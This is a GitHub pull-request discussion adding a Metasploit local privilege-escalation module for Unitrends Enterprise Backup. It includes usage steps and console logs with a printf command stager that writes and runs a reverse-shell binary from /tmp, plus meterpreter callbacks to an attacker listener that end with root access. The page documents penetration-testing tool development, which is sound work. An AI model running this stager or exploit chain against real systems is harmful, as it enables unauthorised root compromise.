New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ueb local privesc #9946

Merged
merged 2 commits into from Nov 28, 2018

Conversation

Projects
None yet
6 participants
@synthsec
Copy link
Contributor

synthsec commented Apr 27, 2018

Vulnerable Application

Unitrends UEB 9/10 local privesc

Still works on the demo version of the application available here:
http://free-vmware-backup.unitrends.com/Unitrends-Free-VMware.ova

This exploit leverages bpserverd proprietary protocol to issue commands
as root.

Verification Steps

  1. Get a shell with exploit/linux/http/ueb10_api_systems
  2. use exploit/linux/local/ueb_priv_esc
  3. set session [SESSION]
  4. exploit
  5. A highpriv meterpreter session should have been opened successfully

Scenarios

UEB 10.0 on CentOS 6.5

msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

synthsec added some commits Apr 27, 2018

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 27, 2018

Is there a reason this was written as a local exploit?

Based on the documentation, it's reasonable to expect that port 1743/tcp will be exposed externally.

It would be more useful to make this a remote exploit. Users can pivot to the 127.0.0.1 interface via an existing session for privesc purposes.

There's also an existing Metasploit module ueb9_bpserverd for Unitrends UEB 9 which looks very similar. If the vulnerability has changed since version 9, it might make more sense to implement a target for version 10 in the existing module.

@synthsec

This comment has been minimized.

Copy link
Contributor

synthsec commented Apr 27, 2018

I think it's probably a good call to roll the UEB 10 remote exploit into the existing UEB 9 remote HTTP exploit. This one might warrant it's own submission though, just because it's mechanically a bit different than the existing bpserverd exploit despite looking very similar.

Basically, Unitrends patched the vulnerability exploited by the existing bpserverd module by removing remote access to port 1743. It's still listening on loop back, though, so once a low priv shell is established using ueb10_api_systems, this will get you root.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 27, 2018

So the vulnerability hasn't changed?

Perhaps others will disagree with me (paging @wvu-r7 @sempervictus ), but I think the existing module is sufficient, although it could use a clean up, and some additional documentation to address the firewall changes in version 10.

Using the existing module implementation and pivoting over the session, with route add 127.0.0.1 255.255.255.255 1, is much cleaner. It saves a file write, and doesn't require python to be installed and in $PATH.

Admittedly, pivoting only works with Meterpreter sessions, and doesn't work with all Meterpreters (ie, Java Meterpreter).

If a local version of the module were to be written, it would be nice to use native Rex sockets, which would also avoid a file write.

@asoto-r7

This comment has been minimized.

Copy link
Contributor

asoto-r7 commented May 23, 2018

@synthsec: As @bcoles mentioned, we have a similar module: exploit/linux/misc/ueb9_bpserverd. I would propose that we expand upon the existing ueb9_bpserverd module.

Would you take a look at merging this with ueb9_bpserverd?

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Jun 13, 2018

The more I look at this, the less sure I am about merging it in with the other ueb module. Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use? There are a lot of odd corners in metasploit, so that might be completely normal, but it seems like that's asking for this code to get forgotten. I do agree with @bcoles that this would be improved without the file write, though on the other hand, when I search for UEB in Google, the first hit is Urdu Educational Board in India..... A second Google check suggested that ~1,000 companies use Unitrends; having this exploit would help people, but do we need to spend significant time optimizing something that already works? I'm more than happy to concede on any of these points, and I would be thrilled if someone wants to improve the existing module and polish up this one, but barring that, maybe we should just test and land it? It is useful, it works, and it offers an ability we do not have.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jun 14, 2018

@bwatters-r7 I vote for ship it :shipit:

[...] merging it in with the other ueb module. Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use?

I'm suggesting that using network pivots route add in lieu of this module would be stealthier and would prevent code duplication in the framework. However, network pivots require a meterpreter session rather than a shell command session, which adds validity to this PR as it "offers an ability we do not have".

On the topic of using Rex sockets to communicate with the local network interface, instead of dropping a file to disk, I still prefer Rex sockets, however I'm not going to implement it. There are zero examples of this code pattern in the framework from which the PR author can draw. So ship it.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 10, 2018

What is the state of this?

I believe a v10 http target needs to be created for this to be relevant. My UEB 9.2.0 image, the http module gives me root, meaning there's no need to priv esc.

I just downloaded a new ova, and its 10.2, meaning #9945 isn't vulnerable to it.
I can assist with getting a v10 http target created, but would need someone to host 10.0 for me to download to verify.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 10, 2018

Here is my first attempt (completely untested) at rolling v9 and v10 together.

h00die@589fb4b

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 11, 2018

looks like the v10 exploit gives apache privs on v9.... awesome sauceum, i'm going to go ahead and PR this (had a slight change). THen i'll start looking into the LPE

@h00die h00die referenced this pull request Sep 11, 2018

Merged

Upgrade UEB module with version 10 exploit #10616

1 of 3 tasks complete
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 11, 2018

Finished testing the v9 and v10 integration, PR is up for review. Once that lands i'll start looking at this LPE more. Feel free to review!

@h00die h00die self-assigned this Oct 13, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Oct 13, 2018

This is working for me on my 9.2 box.
Note that this had to be rebased to use the updated ueb_api_rce and set target so that it uses the lower privs exploit.

msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:443 - Sending requests to UEB...
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0'>>/tmp/hBrpU", "printf '\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0'>>/tmp/hBrpU", "printf '\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\165\\150'>>/tmp/hBrpU", "printf '\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0'>>/tmp/hBrpU", "printf '\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301'>>/tmp/hBrpU", "printf '\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170\\20\\133\\211\\341\\231\\266\\14\\260\\3\\315\\200\\205\\300\\170'>>/tmp/hBrpU", "printf '\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/hBrpU ; chmod +x /tmp/hBrpU ; /tmp/hBrpU ; rm -f /tmp/hBrpU"]
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42082) at 2018-10-13 14:18:15 -0400

getuid
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > 
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(linux/http/ueb_api_rce) > use exploit/linux/local/ueb_priv_esc 
msf5 exploit(linux/local/ueb_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ueb_priv_esc) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Writing payload executable to '/tmp/NQXCjMKV'
[*] Writing privesc script to '/tmp/cTSoCZuPF'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42085) at 2018-10-13 14:19:14 -0400
[+] Deleted /tmp/NQXCjMKV
[+] Deleted /tmp/cTSoCZuPF

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/ueb_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /usr/bp
================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40755/rwxr-xr-x   4096   dir   2017-03-03 16:46:26 -0500  AgentReqScript
100444/r--r--r--  17979  fil   2017-03-03 16:20:06 -0500  EULA.pdf
100444/r--r--r--  7479   fil   2017-03-03 16:20:06 -0500  EULA.txt
100444/r--r--r--  18010  fil   2017-03-03 16:20:06 -0500  GPL
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:40 -0500  app-defaults
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:15 -0500  baremetal
40755/rwxr-xr-x   12288  dir   2017-10-18 18:20:30 -0400  bin
100644/rw-r--r--  67     fil   2017-03-07 14:54:12 -0500  bp_VERS
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:12 -0500  bpinit
40755/rwxr-xr-x   4096   dir   2017-03-03 16:46:26 -0500  catalog.dir
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:10 -0500  cdrom_images
40700/rwx------   4096   dir   2018-10-13 14:05:59 -0400  data
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:09 -0500  db
40755/rwxr-xr-x   4096   dir   2018-10-13 14:06:01 -0400  etc
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:51 -0500  images
40755/rwxr-xr-x   4096   dir   2017-03-07 14:54:13 -0500  info.dir
40755/rwxr-xr-x   4096   dir   2017-03-07 14:53:52 -0500  lcdman.dir

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Oct 13, 2018

Looking at this code, i did think about commenting that the hard-coded 127.0.0.1 could be changed to an option, which would allow for the scenario of exploiting UEB on an internal network, pivoted through a meterp. However, the current code executes a binary which is written to local disk, therefore preventing that from working. If it was changed to use a command stager instead it could then be used either way. However, then it feels like it really should be in remote exploit.

I vote, at this point, to leave it as is. I think the probability of NEEDING this to work in a more dynamic fashion is outweighed by the fact that there are two remote exploits already that cover the same territory and it would therefore be redundant and unnecessary.

Based on the lack of response from #10616 I have a bad feeling that @synthsec isn't looking at this any more and won't get around to making these changes anyways :(

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 10, 2018

@synthsec ping, you still around and interested in getting this module fixed up to be landed?

@h00die h00die added the delayed label Nov 15, 2018

@h00die h00die referenced this pull request Nov 16, 2018

Closed

UEB updates per review #1

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 16, 2018

Please see synthsec#1 as it incorporates all of the requested changes.

@h00die h00die merged commit 4d65174 into rapid7:master Nov 28, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully ran sanity checks.
Details
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

h00die added a commit that referenced this pull request Nov 28, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 28, 2018

Ended up making the changes due to author being unresponsive.
38a99ac
4af5ab3

msjenkins-r7 added a commit that referenced this pull request Nov 28, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Nov 28, 2018

Release Notes

The exploits/linux/local/ueb_priv_esc module has been added to the framework. This adds a local privilege escalation to Unitrends Enterprise Backup by sending a known exploit to the local service listener.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment